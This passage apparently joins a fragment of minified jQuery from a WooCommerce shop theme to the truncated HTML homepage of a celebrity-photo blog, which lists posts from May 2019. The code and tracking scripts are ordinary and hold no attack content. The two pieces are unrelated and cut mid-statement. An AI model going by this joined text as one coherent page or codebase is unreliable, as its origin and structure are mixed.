.product_layout_3 .fluid-width-video-wrapper");0<e.length&&(e.offset().top<=n.offset().top-s?i("li.video-icon span.dot").addClass("current"):i(".product-images-controller .video-icon .dot").removeClass("current"),e.offset().top+e.outerHeight()<=n.offset().top&&i(".product-images-controller .video-icon .dot").removeClass("current"))}),0<i(".single-product").length&&i('a[href*="#controller-navigation-image"]:not([href="#"])').click(function(){if(location.pathname.replace(/^\//,"")==this.pathname.replace(/^\//,"")&&location.hostname==this.hostname){var e=i(this.hash);if(e=e.length?e:i("[name="+this.hash.slice(1)+"]"),0<i("#wpadminbar").length)var t=i("#wpadminbar").outerHeight();else t="";if(e.length)return i("html, body").animate({scrollTop:e.offset().top-i(".site-header.sticky").outerHeight()-t},500),!1}}),i(".product-image.video .fluid-width-video-wrapper iframe")&&i(".product_layout_2 .product-images-controller .video-icon > a, .product_layout_3 .product-images-controller .video-icon > a").on("click",function(e){i(".product-image.video .fluid-width-video-wrapper iframe")[0].src+="&autoplay=1",e.preventDefault()})}),jQuery(document).ready(function(a){"use strict";function e(){if(0<a(".product_layout_3").length){a(".product_layout_3 .product-images-wrapper").width();var e=a(".product_layout_3 .product-images-wrapper"),t=a(".product_layout_3 .product_title"),i=a(".product_layout_3 .product-images-wrapper").width()/a(window).width()*100;if(t.css({width:a(window).width(),left:"auto"}),1024<=a(window).width()){t.css({left:a(".product_layout_3 .product-images-controller").offset().left}),t.addClass("for-desktop"),t.css({width:.75*i+"%"});var n=a(".product_layout_3 .product-images-controller"),o=a(".product_layout_3 .product-badges"),s=t.outerHeight();n.css("top",e.offset().top+s+40),o.css("top",s+40)}else t.removeClass("for-desktop")}}if(setTimeout(function(){0<a(".single-product .product .product_infos .cart .StripeElement").children().length&&a(".single-product .product .product_infos .cart").addClass("stripe-button")},1e3),0<a(".product_layout_2").length||0<a(".product_layout_3").length||0<a(".product_layout_4").length){var t=a(".product .product_content_wrapper .product_infos").outerHeight(),n=(a(".product .product_content_wrapper .product_infos").position().top,a(".product .product_content_wrapper .product_infos").outerWidth(),a(".product_content_wrapper").offset().top);t>a(window).innerHeight()-n&&1024<=a(window).width()?a(".product_infos").addClass("long-description"):a(".product_infos").css({top:n}),a(window).scroll(function(){var e=a(window).scrollTop(),t=a("#site-footer").offset().top,i=(a(".product_infos.fixed").offset().top,a(".product_infos.fixed").height());a("#site-footer");t-40<e+i+200?a(".product_infos.fixed:not(.long-description)").css({top:-1*(e+i-t+40)}):a(".product_infos.fixed:not(.long-description)").css({top:n})})}e(),a(window).resize(function(){e()})}),jQuery(document).ready(function(e){"use strict";if(1024<e(window).width()){var t=e(".product .woocommerce-product-rating .woocommerce-review-link").html(),i=(e(".product .woocommerce_review_link_hover"),e(".product .woocommerce-product-rating")),n='<div class="woocommerce_review_link_hover">'+t+"</div>";null!=t&&(i.before(n),i.hover(function(){e(".woocommerce_review_link_hover").addClass("hovered")},function(){e(".woocommerce_review_link_hover").removeClass("hovered")}))}}),jQuery(document).ready(function(o){var i;(o(document).on("click",".plus-btn",function(e){o("body").hasClass("rtl")?$input=o(this).next("input.custom-qty"):$input=o(this).prev("input.custom-qty");var t=parseInt($input.val()),i=parseInt($input.attr("max")),n=parseInt($input.attr("step"))||1;return isNaN(i)?$input.val(t+n).change():t<i&&$input.val(t+n).change(),!1}),o(document).on("click",".minus-btn",function(e){o("body").hasClass("rtl")?$input=o(this).prev("input.custom-qty"):$input=o(this).next("input.custom-qty");var t=parseInt($input.val()),i=parseInt($input.attr("min")),n=parseInt($input.attr("step"))||1;return isNaN(i)?$input.val(t-n).change():i<t&&$input.val(t-n).change(),!1}),1024<o(window).width())&&(o(document).on("mousedown",".plus-btn",function(e){$input=o(this).prev("input.custom-qty");var t=parseInt($input.val());i=setInterval(function(){t++,$input.val(t)},250)}),o(document).on("mousedown",".minus-btn",function(e){$input=o(this).next("input.custom-qty");var t=parseInt($input.val());i=setInterval(function(){1<t&&(t--,$input.val(t))},250)}),document.addEventListener("mouseup",function(){i&&clearInterval(i)}))}),jQuery(function(t){function e(e){"number"==typeof e&&isFinite(e)&&Math.floor(e)===e&&0<=e&&t(".wishlist_items_number").html(e)}if(t(".wishlist_items_number").length){var i=0,n=function(e){var t=document.cookie,i=e+"=",n=t.indexOf("; "+i);if(-1==n){if(0!=(n=t.indexOf(i)))return null}else{n+=2;var o=document.cookie.indexOf(";",n);-1==o&&(o=t.length)}return decodeURIComponent(decodeURIComponent(t.substring(n+i.length,o)))}("yith_wcwl_products");if(null!=n){n=n.slice(0,n.indexOf("]")+1);var o=JSON.parse(n);i=Object.keys(o).length}else i=Number(t(".wishlist_items_number").html());t("body").on("added_to_wishlist",function(){e(++i)}),t("body").on("removed_from_wishlist",function(){e(--i)}),e(i)}}),jQuery(document).ready(function(e){"use strict";1==getbowtied_scripts_vars.catalog_mode&&(e("form.cart div.quantity").empty(),e("form.cart button.single_add_to_cart_button").remove())}),jQuery(document).ready(function(i){function n(){i("body").hasClass("gbt_custom_notif")&&(i(".page-notifications").removeClass("animate").empty(),setTimeout(function(){function e(e){0<e.html().length&&(0==e.find(".woocommerce-message-wrapper").length&&0==e.find(".product_notification_wrapper").length&&e.wrapInner("<div class='notice-text'></div>"),e.detach().appendTo(".page-notifications").addClass("notification"))}i(".gbt_custom_notif:not(.woocommerce-account) .woocommerce-notice:not(.woocommerce-info)").each(function(){i(this).hasClass("woocommerce-thankyou-order-received")||e(i(this))}),i(".gbt_custom_notif:not(.woocommerce-account) .woocommerce-info").each(function(){e(i(this))}),i(".gbt_custom_notif:not(.woocommerce-account) .woocommerce-error").each(function(){e(i(this))}),i(".gbt_custom_notif:not(.woocommerce-account) .woocommerce-message").each(function(){e(i(this))}),0<i(".page-notifications").html().length&&i(".page-notifications").addClass("animate")},1e3))}0<i("body.gbt_classic_notif").find(".product_layout_3").length&&(i(".woocommerce-message").detach().prependTo(".product_layout_3"),i(".woocommerce-info").detach().prependTo(".product_layout_3"),i(".woocommerce-notice").detach().prependTo(".product_layout_3"),i(".woocommerce-error").detach().prependTo(".product_layout_3")),i("body").hasClass("gbt_custom_notif")&&i("body").on("click touchend",".woocommerce-error, .woocommerce-info, .woocommerce-message, .woocommerce-notice",function(e){i(this).addClass("fade-out");var t=i(this);setTimeout(function(){t.css("display","none")},500,t)}),i(window).load(function(e){n()}),i(document.body).on("updated_cart_totals",function(){n()}),i(document).on("added_to_cart",function(e,t){n()}),i(".page-notifications").on("change",function(){n()}),i("form.woocommerce-checkout, .checkout_coupon").on("submit",function(){n()});var o=!1;i("body").on("click touchend",".ajax_add_to_cart",function(){if(i(".woocommerce-message").remove(),i("body").hasClass("woocommerce-wishlist"))var e=i(this).parents("tr").find("img.attachment-shop_thumbnail").attr("src"),t=i(this).parents("tr").find(".product-name a").html();else e=i(this).parents("li").find("img.attachment-shop_catalog").attr("src"),t=i(this).parents("li").find(".product-title-link").html();o=!(void 0===e||void 0===t||!i("body").hasClass("gbt_custom_notif"))&&'<div class="woocommerce-message"><div class="product_notification_wrapper"><div class="product_notification_background" style="background-image:url('+e+')"></div><div class="product_notification_text">&quot;'+t+"&quot;"+addedToCartMessage+"</div></div></div>"}),i(document).on("added_to_cart",function(e,t){0!=o&&(i("#content").prepend(o),o=!1)});var s=!1;i("body.single-product").on("click touchend",".product_content_wrapper .product_infos .ajax_add_to_cart",function(){if(i(".product_infos a.added_to_cart_button").remove(),i(".woocommerce-message").remove(),i(".woocommerce-error").remove(),i("body").hasClass("gbt_custom_notif")){var e=i("body.single-product .product-images-wrapper").find(".woocommerce-product-gallery__image:first-child img.wp-post-image").attr("src"),t=i("body.single-product .product_content_wrapper").find(".product_title").html();void 0!==e&&void 0!==t&&(s='<div class="woocommerce-message notification"><div class="product_notification_wrapper"><div class="product_notification_background" style="background-image:url('+e+')"></div><div class="product_notification_text">&quot;'+t+"&quot;"+addedToCartMessage+"</div></div></div>")}else{void 0!==(t=i("body.single-product .product_content_wrapper").find(".product_title").html())&&(s='<div class="woocommerce-message" role="alert"><div class="woocommerce-message-wrapper"><span class="success-icon"><i class="spk-icon spk-icon-cart-shopkeeper"></i></span><span class="notice_text">&quot;'+t+"&quot;"+addedToCartMessage+"</span></div></div>")}i(document).on("added_to_cart",function(e,t){0!=s&&setTimeout(function(){0<i("body").find(".product_layout_3").length?i(".product_layout_3").prepend(s):i(".product_content_wrapper").prepend(s),i(".page-notifications").trigger("change"),s=!1},3500)})})}),jQuery(function(t){"use strict";t(".shortcode_getbowtied_slider").each(function(){var e=t(this).attr("data-autoplay");t.isNumeric(e)?e*=1e3:e=1e4;new Swiper(t(this),{direction:"horizontal",loop:!0,grabCursor:!0,preventClicks:!0,preventClicksPropagation:!0,autoplay:e,speed:600,effect:"slide",pagination:t(this).find(".shortcode-slider-pagination"),paginationClickable:!0,nextButton:t(this).find(".swiper-button-next"),prevButton:t(this).find(".swiper-button-prev"),parallax:!0})})}),jQuery(function(o){"use strict";o(window).load(function(){}),o(window).resize(function(){}),o(window).scroll(function(){}),o("a.has-hover-img").mousemove(function(e){var t=o(this).parent().offset(),i=e.pageX-t.left+20,n=e.pageY-t.top+10;o(this).find("span.menu-hover-img").stop().css({left:i,top:n})})});
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/11"><!--begin: blog tracking--><!-- Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-39697070-1"></script><script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-39697070-1');</script><!--end: blog tracking--><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>SAWFIRST | Hot Celebrity Pictures</title><link rel="Shortcut Icon" href="https://www.sawfirst.com/wp-content/themes/Fashionpress/images/favicon.ico" type="image/x-icon" /><link rel="pingback" href="https://www.sawfirst.com/xmlrpc.php" /><link rel="stylesheet" href="https://www.sawfirst.com/wp-content/themes/Fashionpress/style.css" type="text/css" media="screen" /><meta name="description" content="View latest HQ Celebrity Pics, Actresses Paparazzi Pictures, Models Photoshoot at SawFirst" /><meta name="Keywords" content="candids, celebrities, celebrity, celebs, entertainment, gossip, hot, paparazzi, photos, photoshoot, photoshoots, pics, pictures, magazines, HQ" /><meta name="subject" content="Entertaiment" /><meta name="Language" content="en_US" /><meta http-equiv="Expires" content="never" /><meta name="distribution" content="Global" /><meta name="robots" content="index,follow,noodp,noydir" /><link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.sawfirst.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css">img.wp-smiley,img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important;}</style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.sawfirst.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /><link rel='stylesheet' id='mashsb-styles-css' href='https://www.sawfirst.com/wp-content/plugins/mashsharer/assets/css/mashsb.min.css?ver=3.6.3' type='text/css' media='all' /><style id='mashsb-styles-inline-css' type='text/css'>.mashsb-count {color:#cccccc;}@media only screen and (min-width:568px){.mashsb-buttons a {min-width: 177px;}}</style><script type='text/javascript' src='https://www.sawfirst.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script><script type='text/javascript' src='https://www.sawfirst.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script><link rel='https://api.w.org/' href='https://www.sawfirst.com/wp-json/' /> <!-- <script src="https://cdn.siteswithcontent.com/js/push/subscribe.js?v=1.1.0"></script> --> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({article:'auto'}); !function (e, f, u, i) { if (!document.getElementById(i)){ e.async = 1; e.src = u; e.id = i; f.parentNode.insertBefore(e, f); } }(document.createElement('script'), document.getElementsByTagName('script')[0], '//cdn.taboola.com/libtrc/sawfirstcom/loader.js', 'tb_loader_script'); if(window.performance && typeof window.performance.mark == 'function') {window.performance.mark('tbl_ic');}</script> </head><body><script> window.fbAsyncInit = function() { FB.init({ appId : '109175106302423', xfbml : true, version : 'v2.7' }); }; (function(d, s, id){ var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) {return;} js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script><div id="wrapper"><div id="header"> <a href="https://www.sawfirst.com"> <div class="logo"></div> <!--end: logo--> </a> <div class="ad728x90"><!-- Begin js tags AdTrue for sawfirst.com_728x90 - Do not Modify --><div id="adtrue_tag_10883"></div><script data-cfasync='false' type='text/javascript' src='//cdn.adtrue.com/rtb/async.js' async></script><script type="text/javascript"> var adtrue_tags = window.adtrue_tags || []; adtrue_tags.push({ tag_id: 10883, width: 728, height: 90, });</script><!-- End Tags --></div> <!--end: ad728x90--> </div><!--end: header--><div id="top"> <div class="left"><a class="register" href="https://www.sawfirst.com" title="SAWFIRST HOME"> HOME </a> |<a class="login" href="https://www.sawfirst.com/celebrities" title="CELEBRITIES"> CELEBRITIES </a> | <span class="time">4:29 pm - Thu - May 16, 2019</span></div> <div class="right"> <form method="get" id="searchform" action="https://www.sawfirst.com/"> <div id="search"> <input class="searchinput" type="text" value="Type here..." onclick="this.value='';" name="s" id="s" /> <input type="submit" class="searchsubmit" value="SEARCH"/> </div> </form> </div> <div class="right"> <span class="twitter"><a href="https://www.sawfirst.com/selena-gomez">SELENA GOMEZ</a></span> <span class="twitter"><a href="https://www.sawfirst.com/miley-cyrus">MILEY CYRUS</a></span> </div></div><!--end: top--><div id="container"><div id="col1"> <div id="content"> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/alessandra-ambrosio-at-les-miserables-screening-72nd-annual-cannes-film-festival-2019-05-16.html" rel="bookmark" title="Permanent Link to Alessandra Ambrosio at &#8216;Les Miserables&#8217; Screening, 72nd Annual Cannes Film Festival"> Alessandra Ambrosio at &#8216;Les Miserables&#8217; Screening, 72nd Annual Cannes Film Festival </a></h2> <div class="byline"> Posted on May. 16th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/alessandra-ambrosio-at-les-miserables-screening-72nd-annual-cannes-film-festival-2019-05-16.html"></fb:comments-count> Comment and 1,017 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/alessandra-ambrosio-at-les-miserables-screening-72nd-annual-cannes-film-festival-2019-05-16.html" class="thumbnail"><img width="683" height="1024" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Alessandra-Ambrosio-at-Les-Miserables-Screening-6.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Alessandra Ambrosio at &#039;Les Miserables&#039; Screening, 72nd Annual Cannes Film Festival" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/alessandra-ambrosio-at-les-miserables-screening-72nd-annual-cannes-film-festival-2019-05-16.html#more-194455" class="more-link"><span aria-label="Continue reading Alessandra Ambrosio at &#8216;Les Miserables&#8217; Screening, 72nd Annual Cannes Film Festival">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/alessandra-ambrosio" rel="category tag">Alessandra Ambrosio</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/72nd-annual-cannes-film-festival" rel="tag">72nd Annual Cannes Film Festival</a>, <a href="https://www.sawfirst.com/les-miserables" rel="tag">Les Miserables</a>, <a href="https://www.sawfirst.com/screening" rel="tag">Screening</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/ashley-benson-leaving-a-workout-in-studio-city-2019-05-16.html" rel="bookmark" title="Permanent Link to Ashley Benson Leaving a Workout in Studio City"> Ashley Benson Leaving a Workout in Studio City </a></h2> <div class="byline"> Posted on May. 16th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/ashley-benson-leaving-a-workout-in-studio-city-2019-05-16.html"></fb:comments-count> Comment and 773 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/ashley-benson-leaving-a-workout-in-studio-city-2019-05-16.html" class="thumbnail"><img width="1280" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Ashley-Benson-after-Workout-8.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Ashley Benson Leaving a Workout in Studio City" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/ashley-benson-leaving-a-workout-in-studio-city-2019-05-16.html#more-194442" class="more-link"><span aria-label="Continue reading Ashley Benson Leaving a Workout in Studio City">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/ashley-benson" rel="category tag">Ashley Benson</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/studio-city" rel="tag">Studio City</a>, <a href="https://www.sawfirst.com/workout" rel="tag">Workout</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/izabel-goulart-in-bikini-on-the-beach-in-cannes-2019-05-16.html" rel="bookmark" title="Permanent Link to Izabel Goulart in Bikini on the Beach in Cannes"> Izabel Goulart in Bikini on the Beach in Cannes </a></h2> <div class="byline"> Posted on May. 16th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/izabel-goulart-in-bikini-on-the-beach-in-cannes-2019-05-16.html"></fb:comments-count> Comment and 944 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/izabel-goulart-in-bikini-on-the-beach-in-cannes-2019-05-16.html" class="thumbnail"><img width="1280" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Izabel-Goulart-in-Bikini-503.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Izabel Goulart in Bikini on the Beach in Cannes" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/izabel-goulart-in-bikini-on-the-beach-in-cannes-2019-05-16.html#more-194415" class="more-link"><span aria-label="Continue reading Izabel Goulart in Bikini on the Beach in Cannes">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/izabel-goulart" rel="category tag">Izabel Goulart</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/beach" rel="tag">Beach</a>, <a href="https://www.sawfirst.com/bikini" rel="tag">Bikini</a>, <a href="https://www.sawfirst.com/cannes" rel="tag">Cannes</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/vanessa-hudgens-at-propel-vitamin-boost-launch-event-in-new-york-2019-05-16.html" rel="bookmark" title="Permanent Link to Vanessa Hudgens at Propel Vitamin Boost Launch Event in New York"> Vanessa Hudgens at Propel Vitamin Boost Launch Event in New York </a></h2> <div class="byline"> Posted on May. 16th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/vanessa-hudgens-at-propel-vitamin-boost-launch-event-in-new-york-2019-05-16.html"></fb:comments-count> Comment and 797 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/vanessa-hudgens-at-propel-vitamin-boost-launch-event-in-new-york-2019-05-16.html" class="thumbnail"><img width="1280" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Vanessa-Hudgens-at-Propel-Vitamin-Boost-Launch-Event-1.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Vanessa Hudgens at Propel Vitamin Boost Launch Event in New York" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/vanessa-hudgens-at-propel-vitamin-boost-launch-event-in-new-york-2019-05-16.html#more-194397" class="more-link"><span aria-label="Continue reading Vanessa Hudgens at Propel Vitamin Boost Launch Event in New York">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/vanessa-hudgens" rel="category tag">Vanessa Hudgens</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/new-york" rel="tag">New York</a>, <a href="https://www.sawfirst.com/propel-vitamin-boost-launch-event" rel="tag">Propel Vitamin Boost Launch Event</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/selena-gomez-for-puma-spring-and-summer-2019-collection-photoshoot-2019-05-16.html" rel="bookmark" title="Permanent Link to Selena Gomez for Puma Spring and Summer 2019 Collection Photoshoot"> Selena Gomez for Puma Spring and Summer 2019 Collection Photoshoot </a></h2> <div class="byline"> Posted on May. 16th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/selena-gomez-for-puma-spring-and-summer-2019-collection-photoshoot-2019-05-16.html"></fb:comments-count> Comment and 1,437 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/selena-gomez-for-puma-spring-and-summer-2019-collection-photoshoot-2019-05-16.html" class="thumbnail"><img width="1920" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Selena-Gomez-for-Puma-Spring-and-Summer-2019-1.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Selena Gomez for Puma Spring and Summer 2019 Collection Photoshoot" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/selena-gomez-for-puma-spring-and-summer-2019-collection-photoshoot-2019-05-16.html#more-194372" class="more-link"><span aria-label="Continue reading Selena Gomez for Puma Spring and Summer 2019 Collection Photoshoot">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/selena-gomez" rel="category tag">Selena Gomez</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/collection" rel="tag">Collection</a>, <a href="https://www.sawfirst.com/photoshoot" rel="tag">Photoshoot</a>, <a href="https://www.sawfirst.com/puma" rel="tag">Puma</a>, <a href="https://www.sawfirst.com/spring" rel="tag">Spring</a>, <a href="https://www.sawfirst.com/summer" rel="tag">Summer</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div id="taboola-mid-home-thumbnails"></div><script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-e', container: 'taboola-mid-home-thumbnails', placement: 'Mid Home Thumbnails', target_type: 'mix' });</script> <!-- Paste your Adsense code here --> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/selena-gomez-at-the-premiere-of-the-dead-dont-die-at-cannes-2019-2019-05-15.html" rel="bookmark" title="Permanent Link to Selena Gomez at the Premiere of “The Dead Don’t Die” at Cannes 2019"> Selena Gomez at the Premiere of “The Dead Don’t Die” at Cannes 2019 </a></h2> <div class="byline"> Posted on May. 15th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/selena-gomez-at-the-premiere-of-the-dead-dont-die-at-cannes-2019-2019-05-15.html"></fb:comments-count> Comment and 1,749 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/selena-gomez-at-the-premiere-of-the-dead-dont-die-at-cannes-2019-2019-05-15.html" class="thumbnail"><img width="1153" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Selena-Gomez-at-the-Premiere-of-The-Dead-Don’t-Die-11.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Selena Gomez at the Premiere of “The Dead Don’t Die” at Cannes 2019" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/selena-gomez-at-the-premiere-of-the-dead-dont-die-at-cannes-2019-2019-05-15.html#more-194349" class="more-link"><span aria-label="Continue reading Selena Gomez at the Premiere of “The Dead Don’t Die” at Cannes 2019">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/selena-gomez" rel="category tag">Selena Gomez</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/cannes" rel="tag">Cannes</a>, <a href="https://www.sawfirst.com/premiere" rel="tag">Premiere</a>, <a href="https://www.sawfirst.com/the-dead-dont-die" rel="tag">The Dead Don't Die</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/shailene-woodley-in-lofficiel-thailand-summer-2019-2019-05-15.html" rel="bookmark" title="Permanent Link to Shailene Woodley in L’Officiel Thailand, Summer 2019"> Shailene Woodley in L’Officiel Thailand, Summer 2019 </a></h2> <div class="byline"> Posted on May. 15th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/shailene-woodley-in-lofficiel-thailand-summer-2019-2019-05-15.html"></fb:comments-count> Comment and 1,686 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/shailene-woodley-in-lofficiel-thailand-summer-2019-2019-05-15.html" class="thumbnail"><img width="1200" height="800" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Shailene-Woodley-in-L’Officiel-Thailand-Summer-2019-2.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Shailene Woodley in L’Officiel Thailand, Summer 2019" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/shailene-woodley-in-lofficiel-thailand-summer-2019-2019-05-15.html#more-194343" class="more-link"><span aria-label="Continue reading Shailene Woodley in L’Officiel Thailand, Summer 2019">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/shailene-woodley" rel="category tag">Shailene Woodley</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/lofficiel" rel="tag">L’Officiel</a>, <a href="https://www.sawfirst.com/summer" rel="tag">Summer</a>, <a href="https://www.sawfirst.com/thailand" rel="tag">Thailand</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/izabel-goulart-at-the-premiere-of-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html" rel="bookmark" title="Permanent Link to Izabel Goulart at the Premiere of &#8220;The Dead Don&#8217;t Die&#8221; &#038; Opening Ceremony, 72nd Cannes Film Festival"> Izabel 